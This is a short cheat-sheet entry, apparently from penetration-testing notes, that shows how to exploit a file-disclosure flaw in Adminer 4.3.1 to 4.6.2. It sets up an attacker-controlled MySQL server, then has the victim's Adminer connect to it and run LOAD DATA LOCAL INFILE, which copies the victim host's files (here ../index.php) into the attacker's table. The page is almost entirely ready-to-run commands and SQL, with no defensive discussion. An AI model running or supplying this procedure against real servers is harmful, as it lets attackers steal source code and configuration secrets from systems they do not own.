#######
Adminer
#######

***************
File disclosure
***************

| Vulnerability affecting versions 4.3.1 => 4.6.2
| Attacker connect adminer to external database and extract adminer host's files.

| Set up attacker DB:

.. code-block:: bash

  # Create MySQL container 
  sudo docker run -d --rm -it -e MYSQL_ROOT_PASSWORD=password --net="host" mysql:5.7

  # Connect to MySQL DB
  sudo mysql -h 127.0.0.1 -u root -ppassword

  # Create DB & Table
  create database exploit;
  use exploit;
  create table dmp(content varchar(5000));

| After login to Adminer with attacker DB credentials,
| Go to "SQL Command" section and retrieve distant file (here "../index.php"):

.. code-block:: sql

    load data local infile '../index.php'
    into table dmp
    fields terminated by "\n"

| Use adminer or command line to read dumped files